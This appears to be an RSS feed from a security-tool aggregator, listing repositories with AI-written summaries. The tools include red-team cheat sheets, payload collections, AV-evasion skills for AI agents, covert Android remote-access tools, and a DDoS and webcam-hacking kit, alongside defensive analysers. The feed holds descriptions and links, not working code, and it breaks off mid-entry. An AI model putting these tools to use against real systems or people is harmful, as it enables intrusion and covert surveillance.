<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Malware on HackyFeed</title><link>https://rainmana.github.io/hackyfeed/categories/malware/</link><description>Recent content in Malware on HackyFeed</description><generator>Hugo</generator><language>en-us</language><lastBuildDate>Mon, 30 Mar 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://rainmana.github.io/hackyfeed/categories/malware/feed.xml" rel="self" type="application/rss+xml"/><item><title>A-Red-Teamer-diaries</title><link>https://rainmana.github.io/hackyfeed/tools/ihebski-a-red-teamer-diaries/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ihebski-a-red-teamer-diaries/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; A-Red-Teamer-diaries is a collaborative repository containing publicly accessible notes and resources for penetration testing and red teaming activities, focusing on various tools and techniques employed during security assessments. Key features include a cheatsheet for quick command reference, detailed methodologies for effective exploitation, and practical scripts for network scanning and enumeration, enhancing both learning and efficiency in cybersecurity engagements. This tool serves as a practical guide for professionals aiming to improve their pentesting methodologies in controlled environments.&lt;/p&gt;</description></item><item><title>AboutSecurity</title><link>https://rainmana.github.io/hackyfeed/tools/wgpsec-aboutsecurity/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wgpsec-aboutsecurity/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AboutSecurity is a comprehensive security assessment tool that provides a variety of dictionaries and payloads tailored for penetration testing tasks. Its features include an extensive set of predefined dictionaries for different attack vectors, a range of skills related to reconnaissance, exploitation, and post-exploitation, as well as external tool integration for scanning and fuzzing, complemented by reference documentation for effective team collaboration.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="aboutsecurity"&gt;AboutSecurity&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Dic&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Auth : 认证字典
&lt;ul&gt;
&lt;li&gt;账号和密码。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Network : 网络
&lt;ul&gt;
&lt;li&gt;排除的私有 IP 段、本地 IP 段、dns 服务器列表。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Port : 端口字典
&lt;ul&gt;
&lt;li&gt;按照端口渗透的想法,将不同端口承载的服务可爆破点作为字典内容。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Regular : 规则字典
&lt;ul&gt;
&lt;li&gt;各种规则、排列的字典整理。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Web : Web 字典
&lt;ul&gt;
&lt;li&gt;web 渗透过程中出现的可爆破点作为字典内容。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Payload&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Burp&lt;/li&gt;
&lt;li&gt;CORS&lt;/li&gt;
&lt;li&gt;email&lt;/li&gt;
&lt;li&gt;Format&lt;/li&gt;
&lt;li&gt;HPP&lt;/li&gt;
&lt;li&gt;LFI&lt;/li&gt;
&lt;li&gt;OOB&lt;/li&gt;
&lt;li&gt;SQL-Inj&lt;/li&gt;
&lt;li&gt;SSI&lt;/li&gt;
&lt;li&gt;XSS&lt;/li&gt;
&lt;li&gt;XXE&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Skills&lt;/strong&gt; — AI Agent 技能方法论 (55 skills)
&lt;ul&gt;
&lt;li&gt;recon (5) : 侦察类 — 资产侦察、被动信息收集、子域名深挖、目标画像、社会工程&lt;/li&gt;
&lt;li&gt;exploit (26) : 漏洞利用类 — SQL 注入、XSS、SSTI、文件上传、反序列化、JWT、GraphQL、SSRF/XXE、CORS、CSRF、OAuth、WebSocket、竞态条件、缓存投毒/请求走私等&lt;/li&gt;
&lt;li&gt;ctf (5) : CTF 竞赛类 — Web 解题方法论、CTF 侦察、源码审计、Flag 搜索、Flag 校验&lt;/li&gt;
&lt;li&gt;postexploit (6) : 后渗透类 — Linux/Windows 后渗透、提权检查、凭据喷射、横向移动、持久化&lt;/li&gt;
&lt;li&gt;lateral (3) : 内网渗透类 — AD 域攻击、内网侦察、多层网络穿透&lt;/li&gt;
&lt;li&gt;cloud (2) : 云环境类 — 云元数据利用、IAM 权限审计与提权&lt;/li&gt;
&lt;li&gt;evasion (4) : 免杀对抗类 — C2 框架免杀、Shellcode Loader 生成、免杀技术整合、安全研究&lt;/li&gt;
&lt;li&gt;general (4) : 综合类 — 红队评估、移动后端 API、报告生成、供应链审计&lt;/li&gt;
&lt;li&gt;📊 &lt;strong&gt;Skill Benchmark&lt;/strong&gt;: &lt;code&gt;python scripts/bench-skill.py --all&lt;/code&gt; — A/B 测试 Skill 对 Agent 的实际效果&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tools&lt;/strong&gt; — 外部工具声明式 YAML 配置
&lt;ul&gt;
&lt;li&gt;scan : 扫描工具 (nmap, masscan)&lt;/li&gt;
&lt;li&gt;fuzz : Fuzz 工具 (dirsearch)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Doc&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Checklist&lt;/strong&gt; : 渗透测试过程中的检查项,杜绝少测、漏测的情况。&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cheatsheet&lt;/strong&gt; : 渗透测试信息收集表,渗透测试时直接复制一副作为参考、信息记录、方便团队协作、出报告等。&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;出报告专用&lt;/strong&gt; : 记录部分平常渗透测试遇到的案例。&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;行业名词&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="参考"&gt;参考&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/anthropics/skills/blob/main/skills/skill-creator/SKILL.md"&gt;https://github.com/anthropics/skills/blob/main/skills/skill-creator/SKILL.md&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/ljagiello/ctf-skills"&gt;https://github.com/ljagiello/ctf-skills&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/JDArmy/Evasion-SubAgents"&gt;https://github.com/JDArmy/Evasion-SubAgents&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Active-Directory-Exploitation-Cheat-Sheet</title><link>https://rainmana.github.io/hackyfeed/tools/integration-it-active-directory-exploitation-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/integration-it-active-directory-exploitation-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Active Directory Exploitation Cheat Sheet serves as a comprehensive resource for cybersecurity professionals, detailing methodologies and commands for navigating the Active Directory environment. Its primary use case involves facilitating reconnaissance, privilege escalation, and lateral movement within a network through structured commands using Powershell and .Net. Notable features include a systematic approach to various stages of the exploitation process, including domain enumeration, persistence techniques, and monitoring account vulnerabilities.&lt;/p&gt;</description></item><item><title>Active-Directory-Exploitation-Cheat-Sheet</title><link>https://rainmana.github.io/hackyfeed/tools/s1ckb0y1337-active-directory-exploitation-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/s1ckb0y1337-active-directory-exploitation-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Active Directory Exploitation Cheat Sheet serves as a comprehensive resource for security professionals, detailing various enumeration and attack techniques within Windows Active Directory environments. It encompasses methods for domain enumeration, local privilege escalation, lateral movement, and domain persistence, while providing actionable insights and references to essential tools such as PowerView, Mimikatz, and BloodHound. This tool is particularly notable for its structured approach to various exploitation vectors, facilitating an efficient and systematic exploitation process.&lt;/p&gt;</description></item><item><title>ADB-Toolkit</title><link>https://rainmana.github.io/hackyfeed/tools/ashwin990-adb-toolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ashwin990-adb-toolkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ADB-Toolkit is a comprehensive toolkit designed for testing and auditing Android Debug Bridge (ADB) configurations and vulnerabilities. Its primary use case lies in enhancing the security of Android devices by providing features such as device enumeration, file management, and installation of applications via ADB commands. Notable features include a user-friendly interface and extensive enhancements for common tasks associated with ADB, making it suitable for both developers and security researchers.&lt;/p&gt;</description></item><item><title>adbwebkit</title><link>https://rainmana.github.io/hackyfeed/tools/jxroot-adbwebkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jxroot-adbwebkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ADB WebKit is a browser-based tool designed for managing Android devices via ADB (Android Debug Bridge) with an intuitive user interface. Its primary use case includes functionalities like application management (installing, uninstalling, granting permissions), shell access, screen capture, and device control commands, making it a comprehensive solution for developers and testers. Notable features include support for live application management, real-time screen interactions, and various device control options, all accessible through a USB connection or IP address.&lt;/p&gt;</description></item><item><title>afrog</title><link>https://rainmana.github.io/hackyfeed/tools/zan8in-afrog/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zan8in-afrog/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Afrog is a security tool designed for bug bounty programs, penetration testing, and red teaming efforts. It facilitates the creation and execution of Proofs of Concept (PoCs) to help security professionals identify vulnerabilities in systems. Notable features include a streamlined PoC writing guide, multi-language support, and a community-driven approach to contribute new exploit techniques.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;a href="http://afrog.net"&gt;&lt;img src="images/afrog-logo.svg" width="60px" alt="afrog"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;!-- &lt;/a&gt; &lt;h1 align="center"&gt;afrog&lt;/h1&gt; --&gt;
&lt;h4 align="center"&gt;A Security Tool for Bug Bounty, Pentest and Red Teaming&lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;a href="README.md"&gt;English&lt;/a&gt; •
 &lt;a href="docs/README_CN.md"&gt;中文&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>agentic-radar</title><link>https://rainmana.github.io/hackyfeed/tools/splx-ai-agentic-radar/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/splx-ai-agentic-radar/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Agentic Radar is a security scanner specifically designed for analyzing agentic workflows, enabling users to identify vulnerabilities within their processes. Key features include Agentic Prompt Hardening, testing for vulnerabilities, and integration with CI/CD workflows, ensuring that security is maintained throughout the development lifecycle.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;a href="https://splx.ai"&gt;
 &lt;img src="https://github.com/splx-ai/agentic-radar/raw/main/docs/logo.png" alt="logo" width="600" height="auto" /&gt;
 &lt;/a&gt;
 &lt;p&gt;
 A Security Scanner for your agentic workflows!
 &lt;/p&gt;
&lt;!-- Badges --&gt;
&lt;p&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/graphs/contributors"&gt;
 &lt;img src="https://img.shields.io/github/contributors/splx-ai/agentic-radar" alt="contributors" /&gt;
 &lt;/a&gt;
 &lt;a href=""&gt;
 &lt;img src="https://img.shields.io/github/last-commit/splx-ai/agentic-radar" alt="last update" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/network/members"&gt;
 &lt;img src="https://img.shields.io/github/forks/splx-ai/agentic-radar" alt="forks" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/stargazers"&gt;
 &lt;img src="https://img.shields.io/github/stars/splx-ai/agentic-radar" alt="stars" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/issues/"&gt;
 &lt;img src="https://img.shields.io/github/issues/splx-ai/agentic-radar" alt="open issues" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/splx-ai/agentic-radar/blob/main/LICENSE"&gt;
 &lt;img src="https://img.shields.io/github/license/splx-ai/agentic-radar.svg" alt="license" /&gt;
 &lt;/a&gt;
 &lt;a href="https://pypi.org/project/agentic-radar"&gt;
 &lt;img src="https://img.shields.io/pypi/v/agentic-radar" alt="PyPI - Version" /&gt;
 &lt;/a&gt;
 &lt;a href="https://pypi.org/project/agentic-radar"&gt;
 &lt;img src="https://static.pepy.tech/badge/agentic-radar" alt="PyPI - Downloads" /&gt;
 &lt;/a&gt;
 &lt;br /&gt;
 &lt;a href="https://discord.gg/tR2d54utZc"&gt;
 &lt;img src="https://img.shields.io/discord/1346578514177949767?style=for-the-badge&amp;logo=discord&amp;logoColor=white&amp;label=Discord&amp;labelColor=5865F2&amp;color=555555" alt="Discord" /&gt;
 &lt;/a&gt;
 &lt;a href="https://join.slack.com/t/splxaicommunity/shared_invite/zt-31b3hc3mt-A0v78qztTIMSNBg6y~WOAA"&gt;
 &lt;img src="https://img.shields.io/badge/Slack-4A154B?style=for-the-badge&amp;logo=slack&amp;logoColor=white" alt="Slack" /&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>ALHacking</title><link>https://rainmana.github.io/hackyfeed/tools/4lbh4cker-alhacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/4lbh4cker-alhacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ALHacking is a versatile ethical hacking toolkit designed for conducting various cybersecurity activities, including social media and phone attacks, user discovery, and webcam hacks. Notably, it features a powerful DDoS attack tool and is compatible with Android (via Termux), Linux, and Unix operating systems. Users can easily install the toolkit by cloning the repository and running the installation script from the terminal.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;Author: 4lbH4cker&lt;/p&gt;
&lt;h3 id="version-4"&gt;Version 4&lt;/h3&gt;
&lt;p&gt;(&lt;img src="https://raw.githubusercontent.com/4lbH4cker/ALHacking/main/alhacking.png" alt="image"&gt;&lt;/p&gt;</description></item><item><title>AllHackingTools</title><link>https://rainmana.github.io/hackyfeed/tools/mishakorzik-allhackingtools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mishakorzik-allhackingtools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AllHackingTools is a penetration testing toolkit designed for Termux that automates the installation and management of various hacking tools. Its primary use case is to facilitate the setup and customization of a hacking environment on Termux, allowing users to quickly download and run tools directly from the interface. Notable features include an updated installer with enhanced design elements, streamlined updating capabilities, and improved system stability.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img width="99.9%" src="https://raw.githubusercontent.com/mishakorzik/mishakorzik.menu.io/master/img/Logo/IMG-cd518796cb4b0527368a1b9dd67a8889-V.jpg"/&gt;
&lt;p align="center"&gt;
&lt;a href="https://github.com/mishakorzik/AllHackingTools"&gt;&lt;img title="Version" src="https://img.shields.io/badge/Version-2.7.4-yellow?style=for-the-badge&amp;logo="&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik/AllHackingTools/blob/main/LICENSE"&gt;&lt;img title="License" src="https://img.shields.io/badge/License-GNU-brightgreen?style=for-the-badge&amp;logo=gnu"&gt;&lt;/a&gt;
&lt;a href=""&gt;&lt;img title="Python" src="https://img.shields.io/badge/Python-3.8-red?style=for-the-badge&amp;logo=python"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik"&gt;&lt;img title="Report" src="https://img.shields.io/badge/Copyring-2021-red?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;a href="https://github.com/mishakorzik"&gt;&lt;img title="Autor" src="https://img.shields.io/badge/Author-mishakorzik-blue?style=for-the-badge&amp;logo=github"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
• &lt;a href="https://github.com/mishakorzik/AllHackingTools/blob/main/LICENSE"&gt;License&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/AllHackingTools/issues"&gt;Issues&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/AllHackingTools/projects"&gt;Project&lt;/a&gt; 
• &lt;a href="https://github.com/mishakorzik/AllHackingTools/wiki"&gt;Wikipedia&lt;/a&gt; •
&lt;/p&gt;</description></item><item><title>Android-Security-Exploits-YouTube-Curriculum</title><link>https://rainmana.github.io/hackyfeed/tools/actuator-android-security-exploits-youtube-curriculum/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/actuator-android-security-exploits-youtube-curriculum/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Android Security &amp;amp; Reverse Engineering YouTube Curriculum is a comprehensive educational resource focused on various aspects of Android security, including exploits, reverse engineering, and vulnerabilities in mobile applications. It features a curated collection of talks and demonstrations from prominent security conferences, addressing topics like heap exploitation, mobile permissions, and countermeasures against mobile threats. Notably, it educates on advanced concepts such as Bluetooth security, malware analysis, and attack vectors affecting the Android ecosystem, making it essential for cybersecurity practitioners and researchers.&lt;/p&gt;</description></item><item><title>Androl4b</title><link>https://rainmana.github.io/hackyfeed/tools/sh4hin-androl4b/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sh4hin-androl4b/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Androl4b is an Android security virtual machine based on Ubuntu Mate, designed for reverse engineering and malware analysis, incorporating a comprehensive suite of tools and resources. It features updated frameworks, hands-on labs, and various security assessment tools like Radare2, Frida, and MobSF, facilitating both static and dynamic analysis of Android applications. The environment is tailored for security researchers and developers to enhance their understanding and skills in Android security.&lt;/p&gt;</description></item><item><title>AndroRAT</title><link>https://rainmana.github.io/hackyfeed/tools/karma9874-androrat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/karma9874-androrat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AndroRAT is a remote access tool for Android devices that allows users to control and retrieve information from the device. Its primary use case includes monitoring and managing Android systems covertly, featuring capabilities such as persistent backdoor access, audio and video recording, and obtaining device location and SIM details. Notably, AndroRAT consists of a client/server architecture implemented in Java for Android and Python for the server side, enabling it to run on a wide range of Android versions from 4.1 to 9.0, with additional functionalities on Android 10.&lt;/p&gt;</description></item><item><title>AndroRAT</title><link>https://rainmana.github.io/hackyfeed/tools/the404hacking-androrat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/the404hacking-androrat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AndroRAT is a Remote Administration Tool designed for Android devices, enabling the remote control and data retrieval from the Android system. Key functionalities include accessing contacts, call logs, messages, GPS location, and multimedia capabilities like capturing photos and streaming audio and video. The tool operates as a background service triggered by SMS or calls, providing a comprehensive suite for remote monitoring and management.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="androrat"&gt;&lt;a href="https://github.com/The404Hacking/AndroRAT"&gt;AndroRAT&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;Remote Administration Tool for Android&lt;/p&gt;</description></item><item><title>AngryOxide</title><link>https://rainmana.github.io/hackyfeed/tools/ragnt-angryoxide/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ragnt-angryoxide/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AngryOxide is a Rust-based 802.11 attack tool designed for penetration testing and WiFi exploitation research. It provides an active state-based attack engine that retrieves EAPOL messages from access points and clients, with features such as target filtering, auto-hunting capability, and GPS integration for geo-fencing. The tool is equipped with a terminal UI, headless operation mode, and a variety of automated attacks aimed at retrieving cryptographic data for later cracking with tools like Hashcat.&lt;/p&gt;</description></item><item><title>Anthropic-Cybersecurity-Skills</title><link>https://rainmana.github.io/hackyfeed/tools/mukul975-anthropic-cybersecurity-skills/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mukul975-anthropic-cybersecurity-skills/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Anthropic Cybersecurity Skills is an extensive open-source repository that provides AI agents access to 753 structured cybersecurity skills across 26 domains, offering capabilities such as memory forensics and Kubernetes RBAC auditing. The skills adhere to the agentskills.io standard, featuring a YAML structure for quick discovery and are fully mapped to MITRE ATT&amp;amp;CK and aligned with NIST CSF 2.0, enabling AI agents to perform advanced security tasks with enhanced contextual knowledge. This tool simplifies installation and empowers various platforms like Claude Code and GitHub Copilot to integrate these capabilities efficiently.&lt;/p&gt;</description></item><item><title>anti-emulator</title><link>https://rainmana.github.io/hackyfeed/tools/strazzere-anti-emulator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/strazzere-anti-emulator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The anti-emulator tool is designed to detect emulated Android environments, leveraging various detection techniques inspired by both malware behavior and innovative methodologies. It serves primarily for educational and research purposes in the context of malware analysis and reversing, offering a collection of detection mechanisms while promoting responsible use. The project includes both source code and supportive materials, such as presentation slides from its initial unveiling.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="anti-emulator"&gt;anti-emulator&lt;/h1&gt;
&lt;p&gt;Android Anti-Emulator, originally presented at HitCon 2013: &amp;ldquo;Dex Education 201: Anti-Emulation&amp;rdquo;&lt;/p&gt;</description></item><item><title>AntiDBG</title><link>https://rainmana.github.io/hackyfeed/tools/hackovert-antidbg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hackovert-antidbg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; AntiDBG is a tool designed for implementing various anti-debugging techniques on Windows, categorized by methods such as memory, CPU, timing, and forced exceptions. The primary use case is to create self-contained checks that automatically detach debuggers, enhancing the security of applications against reverse engineering. Notable features include a simple API for integration, a testing application named The Gauntlet to evaluate resistance against these techniques, and an emphasis on readability for educational purposes.&lt;/p&gt;</description></item><item><title>antivmdetection</title><link>https://rainmana.github.io/hackyfeed/tools/nsmfoo-antivmdetection/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nsmfoo-antivmdetection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Antivmdetection is a utility script designed to obscure virtual machine (VM) detection techniques by modifying settings within VirtualBox without altering its base. Its primary use case is for enhancing the anonymity of VMs by generating a shell template for host-side modifications and a Windows PowerShell script for guest-side adjustments, addressing various malware fingerprinting methods. Notable features include the ability to automate the configuration process while maintaining compatibility across VirtualBox updates and generating necessary scripts for both host and VM installations.&lt;/p&gt;</description></item><item><title>API-SecurityEmpire</title><link>https://rainmana.github.io/hackyfeed/tools/cyber-guy1-api-securityempire/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cyber-guy1-api-securityempire/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; API Security Empire is a comprehensive resource designed for enhancing API security and conducting penetration testing, featuring mindmaps, tips, and tools based on OWASP TOP 10 API guidelines. It covers information gathering, advanced recon techniques, and detailed methodologies for attacking RESTful, SOAP, and GraphQL APIs. Notable features include updated mindmaps in various formats, a curated list of essential tools, and practical exercises to test penetration skills.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="-api-security-empire"&gt;🛡️ API Security Empire&lt;/h1&gt;
&lt;div align="center"&gt;
&lt;img src="https://github.com/Cyber-Guy1/API-SecurityEmpire/assets/66295316/8b741387-350f-4a61-bce1-d29c6a9ac27d" width="60%" height="60%"&gt;
 &lt;br&gt;
 &lt;small&gt;Project Credits: &lt;a href="https://www.linkedin.com/in/momen-eldawakhly-3b6250204"&gt;Momen Eldawakhly (Cyber Guy)&lt;/a&gt;&lt;/small&gt;
&lt;/div&gt;
&lt;br&gt;
In this repository you will find: Mindmaps, tips &amp; tricks, resources and every thing related to API Security and API Penetration Testing. Our mindmaps and resources are based on OWASP TOP 10 API, our expereince in Penetration testing and other resources to deliver the most advanced and accurate API security and penetration testing resource in the WEB!!
&lt;h2 id="-first-gate-recon"&gt;🚪 First gate: &lt;code&gt;{{Recon}}&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;The first gate to enter the API Security Empire is to know how to gather information about the API infrastructure and how to perform a powerfull recon on API to extract the hidden doors which made you compromise the whole infrastructure from, so, we provide this updated API Recon mindmap with the latest tools and methodologies in API recon:&lt;/p&gt;</description></item><item><title>APKHunt</title><link>https://rainmana.github.io/hackyfeed/tools/cyber-buddy-apkhunt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cyber-buddy-apkhunt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APKHunt is a static code analysis tool specifically designed for Android applications, leveraging the OWASP MASVS framework to identify and rectify security vulnerabilities. It offers comprehensive scanning capabilities, including support for multiple APK files, a low false-positive rate, and optimized rules for accurate vulnerability detection, making it suitable for both mobile developers and security testers. Notably, it produces results in a user-friendly TXT format and is tailored for Linux environments.&lt;/p&gt;</description></item><item><title>APKiD</title><link>https://rainmana.github.io/hackyfeed/tools/rednaga-apkid/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rednaga-apkid/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; APKiD is a tool designed to analyze Android APK files by identifying various compilers, packers, and obfuscators used in their creation, functioning similarly to PEiD for Windows applications. It supports configurable scanning options, outputs results in JSON format, and facilitates contributions for recognizing additional packaging methods. The tool is primarily used for Android security analysis, aiding in the detection of pirated or malicious applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="apkid"&gt;APKiD&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://app.travis-ci.com/rednaga/APKiD"&gt;&lt;img src="https://app.travis-ci.com/rednaga/APKiD.svg?branch=master" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/apkid/"&gt;&lt;img src="https://img.shields.io/pypi/v/apkid.svg" alt="PyPI"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/apkid/"&gt;&lt;img src="https://img.shields.io/pypi/pyversions/apkid.svg" alt="PyPI - Python Version"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/apkid/"&gt;&lt;img src="https://img.shields.io/pypi/format/apkid.svg" alt="PyPI - Format"&gt;&lt;/a&gt;
&lt;a href="https://pypi.org/project/apkid/"&gt;&lt;img src="https://img.shields.io/pypi/l/apkid.svg" alt="PyPI - License"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>APT_REPORT</title><link>https://rainmana.github.io/hackyfeed/tools/blackorbird-apt_report/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blackorbird-apt_report/</guid><description>&lt;blockquote&gt;
